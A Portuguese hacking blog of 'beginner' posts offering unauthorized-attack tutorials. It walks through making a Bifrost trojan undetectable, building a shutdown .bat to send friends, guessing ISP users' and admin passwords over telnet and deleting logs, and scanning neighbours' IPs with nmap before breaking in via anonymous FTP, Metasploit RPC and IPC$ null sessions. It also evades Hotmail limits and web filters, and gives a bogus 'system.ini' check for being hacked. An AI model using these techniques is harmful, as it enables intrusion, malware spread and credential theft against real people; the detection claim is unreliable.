Scanners Online - iniciantes

0 comentários


Esses antivírus fazem uma análise completa do seu disco. A maioria funciona apenas no Internet Explorer ou requer instalação de plugins. Note que antivírus online são extremamente limitados e não possuem os mesmos recursos que soluções comums de antivírus. Por esse motivo, não se baseie no desempenho dos serviços online para escolher sua solução definitiva.

OS MAIS FAMOSOS:

http://www.pandasoftware.com/activescan/

http://support.f-secure.com/enu/home/ols.shtml

http://www.kaspersky.com/virusscanner

http://www.bitdefender.com/scan8/ie.html

http://security.symantec.com/sscv6/default.asp?langid=ie&venid=sym

http://housecall.trendmicro.com/

http://www.ewido.net/en/onlinescan/

http://www.virustotal.com

Todos os outros:
Anubis
http://anubis.iseclab.org/index.php (http://anubis.iseclab.org/index.php)


Avast
http://onlinescan.avast.com/


Dr.Web
http://www.drweb.com/online


Filterbit
http://www.filterbit.com/


Fortinet
http://www.fortiguardcenter.com/anti...s_scanner.html (http://www.fortiguardcenter.com/anti...s_scanner.html)


Microsoft Malware
https://www.microsoft.com/security/portal/submit.aspx


Surfright
https://www.webimmune.net/default.asp


ThreatExpert
http://www.threatexpert.com/filescan.aspx


Kaspersky en ligne virus scanner
http://www.kaspersky.com/virusscanner


McAfee FreeScan
http://fr.mcafee.com/root/mfs/default.asp


Panda ActiceScan 2.0
http://www.pandasecurity.com/activescan/index/

Symantec Security Check
http://security.symantec.com/


BitDefender Scanner en ligne
http://www.bitdefender.com/scan8/ie.html


Trend Micro HouseCall
http://housecall.trendmicro.com/


ActualResearch RegFreeze
http://www.actualresearch.com/rf_onlinescan.php


AHNLAB MyV3
http://global.ahnlab.com/global/products/myv3.html


ArcaBit Analyse en ligne
http://arcaonline.arcabit.com/scanner.html


a-squared Web Malware Scanner
http://www.emsisoft.fr/fr/software/free/


Clamav en ligne
http://www.gietl.com/test-clamav/


Dr.Web en ligne
http://online.drweb.com/?url=1


Emsisoft en ligne
http://www.emsisoft.com/en/software/ax/?scan=1


Eset Analyse en ligne
http://www.eset.com/onlinescan/


ewido (AVG) en ligne avec Spyware Scanner de nettoyage ou de suppression
http://www.ewido.net/en/onlinescan/


F-Secure Online Scanner
http://support.f-secure.com/enu/home/ols.shtml


DoxDesk
http://www.doxdesk.com/parasite/


FaceTime / XBlock X-Cleaner
http://research.sunbelt-software.com/Submit.aspx


Hauri LiveCall
http://www2.globalhauri.com/html/onl...l_service.html (http://www2.globalhauri.com/html/onl...l_service.html)


JoeBox
http://www.joebox.org/submit.php


Jotti's Malware Scan
http://virusscan.jotti.org/


Kaspersky Virus Scanner
http://www.kaspersky.com/scanforvirus


Norman Sandbox
http://www.norman.com/microsites/nsic/Submit/en


PC Pitstop
http://www.pcpitstop.com/antivirus/AVLoad.asp


Sunbelt Malware Sandbox
http://research.sunbelt-software.com/Submit.aspx


Tenebril online Spyware Scanner
http://www.tenebril.com/scanner/main_scan.php


Université de Victoria Adware
http://helpdesk.uvic.ca/security/adw...are_check.html (http://helpdesk.uvic.ca/security/adw...are_check.html)


VirSCAN.org
http://www.virscan.org/


Virus Chaser sur le Web
http://www.viruschaser.com/enwi/4_01.jsp


VirusChief
http://www.viruschief.com/


VirusTotal en ligne
http://www.virustotal.com/


Virus.Org Rogue
http://scanner.virus.org/


Windows Live OneCare
http://onecare.live.com/site/en-us/default.htm


ZoneAlarm Online Spyware Scanner
http://www.zonealarm.com/store/conte...try=US&lang=en (http://www.zonealarm.com/store/*****...try=US&lang=en)


AHNLAB MyV3 Real-Time Scan
http://global.ahnlab.com/global/products/myv3_rts.html


AHNLAB MySpyZero
http://global.ahnlab.com/global/products/myspyzero.html


Athentium commande à la demande
http://www.commandondemand.com/eval/cod/codie.htm


Avert (r) WebImmune Labs
http://analyzer.surfright.nl/analyzer/


Bestand
http://www.anti-virus.by/check/


CA eTrust virus scanner
http://www.ca.com/us/securityadvisor...info/scan.aspx (http://www.ca.com/us/securityadvisor...info/scan.aspx)


CA eTrust PestScan
http://www.ca.com/us/securityadvisor/pestscan/

Guanghua (VirusChina)
http://viruschina.com/include/mfzxsd.asp


Kill AJinChen Web Scan
http://www.kill.com.cn/product/webscan/718.asp


Kingsoft Qing Duba en ligne
http://shadu.duba.net/


NetEase 163.com
http://tech.163.com/Other/virus/1/online(1 (http://tech.163.com/Other/virus/1/online%281)).


NetEese 163.com virus Trojan Clinic Web Detector
http://tech.163.com/Other/virus/muma.html


QQ Centre
http://safe.qq.com/cgi-bin/tso/show_scan


Sanlen sécurité Antiunknown
http://online.sanlen.com/free.htm


Sky.net.cn Scan en ligne
http://pfw.sky.net.cn/scan.html


MKS Skaner On-Line
http://www.anti-virus.by/check/

Deixando seu arquivo Indetectavel - Iniciantes

0 comentários


Esta é uma tecnica antiga, nao funciona mais porem, é esta a sequencia basica para se deixar qualquer arquivo indetectavel, mude apenas os programas .
Programas Necessarios:
- Um Trojan nesse caso o Bifrost
- O Cactus Joiner
- Private Exe Protector
- Bat to Exe Converter


1- Crie Seu Server com o Bifrost ou Outro Trojan
2- Abra o Cactus joiner e selecione seu server
3- Pelo Propio Cactus Joiner Modifiqueo assim: Hide Yes, Regedit Yes
4- Selecione Outro arquivo para apenas usar como Pretexto como uma foto ou Texto
5- Em opcoes Generales Selecione as 2 caixinhas e deixe sem icones mesmo
6- Clique em Ok e depois quando for compilar mude de EXE para BAT
7- Abra o Private Exe Protector e Selecione o BAT que vc criou
8- Proteja-o com o Propio Private Clicando no Cadeadinho
9- Abra o Converte Bat to Exe e Selecione o Bat protegido
10- Selecione um Ícone de Sua preferencia e Compile!

Pronto, esta tecnica funcionava tempos atras, porem pouca coisa mudou, encontre crypters indetectaveis e apenas mude os programas a ordem sempre é a mesma!

Desligando o PC do seu amigo - Inciantes

0 comentários


É muito simples, vc deve seguir os seguintes passos!!!
1º Abra seu Bloco de Notas, pois todo windows vem com um. (Iniciar/ Acessórios..)
2º Cole o Código exatamente como apareçe abaixo, no seu bloco de notas.
shutdown -s -f -t 0
3º Salve em algum lugar que você encontre-o fácil, com qualquer nome, mas tem que ter no final .bat Exemplo: Até mais amigo .bat
4º Encontre onde você salvou, e teste ele. Se desligar seu computador, é porque ficou bom.
5º Se você for mandar pra um amigo por msn, deverá compactar ele antes. Pois o msn não aceita (nem email). Para compactar você deve usar o winzip ou winrar Mais aconselhável winrar.
6º Mande ele e se divirta!!! Obs:Isso só funcionará em seu amigo, se o sistema dele não for Windows 95,97 e 98, pois esses não tem recursos de desligagem automática sem precisar apertar o botão. Divirtam-se!
 

Saiba se voce esta sendo Hackeado - Iniciantes

0 comentários

Saiba se voce esta sendo Hackeado

Vai para INICIAR.

Executar

DIGITE: SYSTEM.INI

OK

VAI APARECER ESTA JANELA QUER ESTAR ESCRITO NELA OS SEGUINTES ITENS

woafont=app850.FON
EGA80WOA.FON=EGA80850.FON
EGA40WOA.FON=EGA40850.FON
CGA80WOA.FON=CGA80850.FON
CGA40WOA.FON=CGA40850.FON

SE APARECER ESTE NUMERO ‘’850’’, ENTÃO SEU PC ESTAR BEM PROTEGIDO!!!

EXEMPLO:

EGA80WOA.FON=EGA80850.FON
EGA40WOA.FON=EGA40850.FON
CGA80WOA.FON=CGA80850.FON
CGA40WOA.FON=CGA40850.FON

E SE APARECER ‘’WOA’’
HUM…ENTÃO SEU PC ESTAR SENDO INVADIDO OU TEM ARQUIVOS QUE FACILITAM A INVASÃO

EXEMPLO:

EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON

Entenda os cookies - Inciantes

0 comentários


Cookie é um tipo de arquivo que armazena no seu micro as configurações escolhidas para uma determinada página ou site . Quando você retornar àquela página , as informações gravadas no cookie serão enviadas para o site , com o nobre objetivo de não apenas reduzir o tempo de acesso mas para personalizá-lo .


Perigo e Privacidade

Há mais de uma maneira de utilizar "cookies" para rastrear a navegação na rede . A modalidade que representa a maior ameaça à privacidade do internauta é conhecida como "web bug" (grampo da rede) .

Ela funciona da seguinte maneira : suponha que você visite um determinado site e receba um "cookie" enviado pela empresa X . Cada cookie , que nada mais é do que um arquivo txt , traz um número de série único que é atribuído ao seu computador .

Em seguida , você visita outro site onde a mesma empresa X também envia cookies . Ao entrar nessa página , os computadores da empresa X reconhecem o número de identificação do seu cookie e acrescentam o endereço visitado a um prontuário digital sobre a sua máquina . Se nada for feito , e você continuar visitando sites onde há cookies dessa mesma empresa , após alguns dias ela terá uma coleção com os endereços que você visitou . Mas ainda não é possível relacionar esses dados com o seu nome , endereço ...

Embora improvável , essa associação é tecnicamente possível : basta que você forneça seus dados pessoais para algum site que se disponha a compartilhá-los com a empresa X .

A DoubleClick http://www.doubleckick.com , empresa que gerencia a maior rede de cookies da Internet , nega adotar qualquer um desses procedimentos .

O problema é que , como o cookie passa sempre por baixo das pernas do proprietário do micro , quem pode garantir que ele contenha somente informações referentes ao site ? Será que ele , já que esteve ali no micro , sem fazer nada , não anotou uns dados importantes e depois , despretensiosamente , comentou com as pessoas do site ?


Defesa e Solução

Se você prefere melhorar a sua privacidade sozinho a confiar em empresas , há vários programas e soluções que podem ajudá-lo .

Como muitos sites não funcionam sem cookies , a única solução é utilizar um software regulador de cookies .
Configurar o browser para não aceitar cookies ;
Download do Cookie Viewer Clique aqui
Download : 290 Kbytes
Descrição : Programa gratuíto ; permite a visualização e o apagamento dos cookies armazenados no PC .
http://www.winmag.com/

Download do IDcide Clique aqui
Download : 1.31 Mbytes
Descrição : Programa gratuíto ; permite o controle e monitoramento dos cookies enviados para o computador do usuário , exibundo o endereço das páginas que estão tentando bisbilhotar o computador ; requer o IE 4 ou superior .
http://www.idcide.com

É perfeitamente possível apagar os "cookies" manualmente , mas como eles podem ser armazenados em várias pastas do micro , você pode acabar esquecendo de eliminar alguns


Internet Explorer e Netscape

Uma opção presente no Internet Explorer é permitir que somente alguns sites enviem os arquivos . Para ativá-la , clique em Ferramentas , Opções da Internet , Segurança , Sites confiáveis , Sites e digite os endereços de cada um . Em seguida , altere o nível de segurança para Médio .

Os navegadores da Netscape permitem um truque para entrar em sites que exigem cookies sem recebê-los : apague o arquivo cookie.txt (ele fica na pasta Users , dentro do diretório Netscape) , crie outro com o mesmo nome e salve-o no mesmo lugar . Depois clique como o botão direito , escolha Propriedades e marque o item Somente leitura . 

Obtendo senhas - Iniciantes

0 comentários


OS MEIOS MAIS COMUNS DE SE CONSEGUIR SENHAS DE ACESSO ESTÃO LISTADOS ABAIXO :

CAVALO DE TRÓIA
O Hacker infiltra em seu alvo um programa semelhante a um vírus. Mas, em lugar de destruir programas e arquivos, ele tem a função de descobrir senhas. O cavalo de Tróia pode ser enviado escondido numa mensagem na Internet ou num disquete que o hacker passa, com jogos ou outros programs, para usuários do computador que quer invadir. Cada vez que o usuário escreve nome e senha, o cavalo de Tróia grava os dados. Como é programado para se conectar com seu criador, por meio do modem, em dia e hora marcados, ele transmite os dados que copiou. Elementar, para quem conhece muito bem as linguagens do computador.

FAREJAMENTO DE REDES
Para acelerar a sua transmissão, os dados que entram nas redes, provenientes de vários computadores, são agrupados em pacotes. O hacker cria programas farejadores que monitoram a circulação desses pacotes nas redes e procuram neles palavras como password e senha. Quando encontra, o programa copia o pacote e o envia para o computador do hacker. Os dados chegam codificados, mas isso não é problema para ele, que, em geral conhece bem criptografia, o conjunto de técnicas que permite codificar dados.

ENGENHARIA SOCIAL

É uma espécie de espionagem. Senhas com datas de nascimento, sobrenome ou nome dos filhos são muito comuns. Se o hacker tiver acesso a essas informações do usuário, vai tentá-las, como primeira opção, para descobrir sua senha. Alguns chegam a arrumar emprego temporário na empresa que pretendem invadir. Lá dentro, prestam atenção nos computadores. Ninguém cobre o teclado na hora de digitar a senha. Mesmo que tenha alguém por perto. Esse alguém pode ser um hacker.

QUEBRA CABEÇA
Um jeito simples de desvendar senhas é a velha tentativa e erro. Para isso, o hacker cria programas capazes de montar todo tipo de combinação de letras e números. O sistema funciona bem para senhas de até seis caracteres. O processo deve levar muito tempo, porque as tentativas precisam ser feitas em períodos curtos, com grandes intervalos (dias, se for possível) entre um e outro, para não despertar suspeitas. No Brasil é um método muito difundido, pois as senhas em geral são simples e dificilmente os computadores possuem sistema de proteção.

INVASÃO DO SERVIDOR
O hacker pode se conectar via FTP anônimo ao servidor e baixar o arquivo que contém as passwords (ex. passwd). Com esse arquivo em mãos o hacker pode descriptografá-lo usando programas específicos. Dessa forma ele obtém praticamente (a descriptografação não é 100% eficiente) todas as passwords desse provedor.

DEDUÇÃO
Um hacker pode usar a lógica para descobrir senhas de acesso. Ao invés de usar o quebra-cabeça que precisa testar milhares de combinações, o hacker faz a tentativa e erro manualmente com as senhas mais prováveis. Para isso ele dispõe de três dados fundamentais:
1. Cerca de 1 em cada 30 usuários usa o login como senha.
2. Muitos administradores usam a senha padrão do sistema.
3. A maioria das senhas está relacionada ao login. Ex: login:kurt senha:cobain

MÃOS A OBRA !!!
Chega de teorizar e vamos descobrir as senhas. Utilizaremos o último método por ser ele o mais simples. O penúltimo método também é descrito detalhadamente no FAQ alt.2600.
Entre na HomePage de algum servidor (experimente www.bhnet.com.br - bem fácil) e procure pela lista de homepages pessoais. Passando o mouse sobre os links que levam à página de cada usuário você pode perceber um padrão do tipo http://www.servidor.com.br/~usuário, onde usuário é o login do dono da página. Se você usa a bosta do Windows 95 vá ao prompt do MSDOS, digite telnet e tecle ENTER. Surgirá uma janela no Win95 com o programa Telnet. Se você usa outro sistema operacional, inicie seu programa de telnet. A vantagem da conexão via telnet é que suas tentativas de entrada não são registradas e você pode tentar quanto tempo quiser (mas nunca exagere). Conecte-se ao host do servidor (www.bhnet.com.br no nosso exemplo). Então entre com o Login de um dos usuários (olhando na lista de homepages) e use como senha esse mesmo login. Tente com todos os usuários. No final você deverá ter algumas senhas. Se você quiser mais senhas de usuários, utilize a lógica, relacionando a senha com o login (ex: login:kurt senha:cobain).
Agora vem o próximo e mais valioso passo. Tentar pegar a senha do administrador. Para isso consulte o FAQ do alt.2600 e descubra quais são as senhas padrões para o administrador em cada sistema. Novamente usando telnet tente até achar ou desistir. Se você conseguir, vai ter acesso total ao servidor e terá hackeado o sistema! Mas cuidado ao usar a senha... você pode ser pego. Quando usar a senha do administrador, não esqueça de apagar os arquivos log ao sair. Veja o FAQ alt.2600 para saber o que são arquivos log, caso você não saiba.

Continuando downloads cancelados pelo Firefox - Iniciantes

0 comentários


Vamos supor, você está baixando um filme ou um jogo 700mb, e então você sua internet cai, o download estava em 80% e você não quer começar tudo de novo, então faça o seguinte:
baixe o wget for windows, você encontra ele nesta pagina: http://pages.interlog.com/~tcharron/wgetwin.html e clique no link "wgetwin-1_5_3_1-binary.zip" e baixe-o.
descompacte-o wget.exe para alguma pasta tipo c:\wget e então abra um terminal (iniciar -> executar e digite cmd para winXP e command.com para outras versões)
mude para a pasta do wget (cd c:\wget)
copie o arquivo .part do firefox para a pasta do wget
remova o .part do nome do arquivo (ex. se era filme3.avi.part vai ficar filme3.avi)
vá até o site de onde você baixou o arquivo e copie o endereço exemplo: http://s2.up-file.com/download3/e32c...br.by.onix.avi
(link do filme turistas upado por onix)
e no terminal dentro da pasta do wget digite:
"wget -c http://s2.up-file.com/download3/e32c...br.by.onix.avi"
(sem as aspas)
e pronto você está baixando o arquivo de onde você parou.

Invasão pelas portas 21,23,135,445 - Iniciantes

0 comentários


Invasão pelas portas:

21: FTP
23: TELNET
135: RPC
445: COMPARTILHAMENTO
Estes ataques precisam ter pessoas do mesmo provedor que você.
Vamos começar:
Pegue o seu ip externo(sugestão:www.meuip.com.br ).
Baixe o nmap e instale no seu pc.
Vamos supor que o seu ip seja: 201.33.22.18.
Entre no prompt comando do Windows e digite nmap. Aparecerá um montão de opções e ajudas para você aprende a utilizar.
Prosseguindo…
Iremos fazer scanner de portas nos computadores da sua redondeza que tem o mesmo provedor que você.
digite:
nmap -sV -T Insane -A -v 201.33.22.1-254 -p21,23,135,44
Pronto vai listar todas as portas abertas de todos os usuários da sua banda larga ou do seu bairro, estado etc depende da sua banda.
Código:
Discovered open port 21/tcp on 201.33.22.223
Discovered open port 23/tcp on 201.33.22.1
Discovered open port 23/tcp on 201.33.22.186
Discovered open port 445/tcp on 201.33.22.14
Discovered open port 445/tcp on 201.33.22.97
Discovered open port 445/tcp on 201.33.22.24
Discovered open port 445/tcp on 201.33.22.152
Discovered open port 445/tcp on 201.33.22.149
Discovered open port 445/tcp on 201.33.22.81
Discovered open port 445/tcp on 201.33.22.69
Discovered open port 445/tcp on 201.33.22.9
Discovered open port 445/tcp on 201.33.22.55
Discovered open port 445/tcp on 201.33.22.113
Discovered open port 445/tcp on 201.33.22.218
Discovered open port 445/tcp on 201.33.22.21
Discovered open port 445/tcp on 201.33.22.107
Discovered open port 445/tcp on 201.33.22.111
Discovered open port 445/tcp on 201.33.22.56
Discovered open port 445/tcp on 201.33.22.178
Discovered open port 445/tcp on 201.33.22.191
Discovered open port 445/tcp on 201.33.22.157
Discovered open port 445/tcp on 201.33.22.127
Discovered open port 445/tcp on 201.33.22.29
Discovered open port 445/tcp on 201.33.22.207
Discovered open port 135/tcp on 201.33.22.175
Discovered open port 135/tcp on 201.33.22.164
Invasao pela porta 21

vamos lá… ira aparecer um tanto de computadores que tem a porta 21 aberta. Todos aqueles que tiverem a mesma aberta. Voce pode tentar logar como anonymous, pois alguns administradores ou pessoas nao si preocupam em retirar o usuario anonymous do ftp.

Iniciar>Executar>cmd>ftp>open>201.33.22.
223>anonym ous>a

Invasao pela porta 23

Iniciar>Executar>cmd>telnet>open>201.33.22 23

Invasao pela porta 135

CASO a porta 135 aberta, podemos usar o METASPLOIT

abra o metasploit na interface web. procure pelo exploit MICROSOFT RPC.

depois disso escolha o tipo de conexao como: GERENIC\SHELL_BLIND_TCP ou voce que sabe o tipo de conexao a ser usada.

depois disso matenha as informaçoes padroes do metasploit só inclua o ip da vitima, pois so o Windows dele nao for atualizado, ele ja vem como shell. Essa invasão rpc dcom já ficou obsoleta também.
Invasao pela porta 445

Esta porta é de compartilhamento.

Iniciar>Executar>cmd>net use \\201.45.241.175\ipc$ “” /u:”"

Comando concluído com êxito.
baixa o Dumpusers

ponha ele no C:\
abra o cmd digite;

dumpusers -target 201.45.241.175 -type notdc -start 1 -stop 900 -mode verbose
depois você vai no:

iniciar>executar>\\201.45.241.175\c$

10 Maneiras de acessar um site bloqueado - Iniciantes

0 comentários


1 – Acesse pelo IP:
Esta é a maneira mais simples de burlar bloqueios apenas por url. Ao invés de digitar por exemplo, youtube.com, você digitaria 208.65.153.242. Uma ferramenta online que lhe mostra o IP de um site você encontra Aqui
2 – Utilize o cache do Google:
Se o site que deseja acessar não é tão atualizado, ou a informação que procurada não é a mais recente, você pode tentar a imagem que está armazenada no Google. É só clicar no “Em cache” nos resultados do Google. Ou digitar o comando “cache:site” na pesquisa do Google. Exemplo: cache:http://gulp.com.br
3 – Tente um Anonymizer:
Por este método você acessa através de um terceiro servidor. São serviços oferecidos muitas vezes gratuitamente, onde você acessa o site que deseja, mas não sai deste outro site, que busca as informações que você quer.
O problema acontece quando alguns desses serviços já estão bloqueados, ai deve-se tentar outra maneira. Para ver bons serviços, procure aqueles que encriptam a url, experimente utilizar o Proxify e o Block Stop, já famoso Anonymouse não oculta a url, então fica mais fácil ser descoberto pelos serviços de filtro.
4 – Utilize os tradutores online:
Esse método funciona quase igual ao descrito acima, como um web proxy. Você pode tentar o Babel fish do altavista e o Google Translate.
5 – Utilize o Google Mobile Search:
Não é a melhor maneira de ver o resultado, mas funciona, também similar a utilizar um web proxy.Link para o serviço .
6 – Utilize um servidor Proxy gratuito:
Existem diversos servidores proxies gratuitos. Por este método você deverá mudar sua configuração da internet, o que se faz facilmente em qualquer browser. Aqui segue uma lista deles. Os que iniciam com 200 correspondem a proxies no Brasil e podem ser mais rápidos.
7 – Receba páginas por e-mail:
Dessa maneira você receberá uma página de cada vez. Obviamente, não é possível acessar uma grande quantidade de informações.
Alguns serviços; você utiliza SEND http://www.yahoo.com/ no corpo da mensagem e envia para agora@dna.affrc.go.jp para receber a página. Serviços semelhantes ao web2mail.
G.E Boyd tem uma grande lista de servidores, mas muitos já não estão funcionando.
8 – Tenha seu próprio servidor proxy:
Esta é uma técnica mais avançada e possivelmente a melhor. Ela necessita de um servidor que pode estar em sua casa ou um host.
Você pode habilitar encriptação SSL e prevenir o roubo de conteúdo. Também coloque algum controle de acesso, mas sempre tenha em mente que alguém poderá encontrar e burlar sua segurança.
Utilize o servidor Apache como servidor proxy, seguindo estes procedimentos (um pouco complexo)
Com o Privoxy – mais recomendado – basta seguir as instruções desta página.
Ou utilize o PHPProxy como seu servidor proxy. Você pode usar PHPProxy e fazer sua configuração.
9 – Use um proxy distribuído Tor:
Tor é um servidor proxy avançado que utiliza múltiplos servidores anônimos para um único request.
Este necessita que você baixe e instale este aplicativo.
10 – Utilize um serviço alternativo:
Quando tudo acima falhar, você pode tentar trocar os serviços.
Se o Gmail é bloqueado, você pegar qualquer outro serviço de e-mail mais desconhecido e habilitar o encaminhamento de mensagem no Gmail para este.
Obs:
Seja cuidadoso quando estiver utilizando servidores proxies gratuitos.
É possível que quem esteja hospedando o serviço, esteja coletando as informações que trafeguem por ele.
Então não é recomendável colocar informações sigilosas como o número do seu cartão de crédito.
Se tiver alguma outra dica ou correção, pode deixar seus comentários.

Criando mais Emails do que permitido no HotMail - Iniciantes

0 comentários


Quando o Hotmail retornar aquele erro, dizendo que você não pode mais criar emails, que só poderá depois de 24 Horas.
Você vai fazer o seguinte !

Isso acontece pois o Hotmail, define um numero de criações por dia /ip.
No nosso caso aqui no Brasil o limite são 3 emails Diarios,
o sistema é o trocar o Ip pelo de algum pais,
para acabar com esse erro vamos fazer o seguinte !

Entre no Site:
http://www.samair.ru/proxy/ip-address-01.htm

Na lista que irá aparecer percebam que tem 2 colunas:
1 coluna: IP
2 coluna: Porta
Pois bem, primeiramente escolha um Ip cuja a porta seja de preferência 80 ou 8080
Pois são as de mais facil acesso ! ( Lembrando que tem que ser de outro pais )

Nesse exemplo vou pegar um Ip da India:
IP: 202.54.61.99
Porta: 8080

Após fazer isso no Seu Firefox tem um Menu la encima.
Clique em Ferramentas > Opções > Clique no canto superior direito na aba que esta escrito " Avançado "
Após isso clique na aba " Rede " e logo abaixo em " Configurar Conexão "
Ao fazer isso irá aparecer uma nova janela:

No começo você irá assinalar a 3ª Opção ... Colocar o IP e a Porta logo na Frente como na foto.
E Assinale a " Caixinha " logo abaixo do IP e de Ok !

Usando esse método você poderá criar muitos emails por dia.

ADM do site

Alisson Pereira Anjos Email/msn:Alisson_esquilo@hotmail.com
Tecno Hacker
Alisson Pereira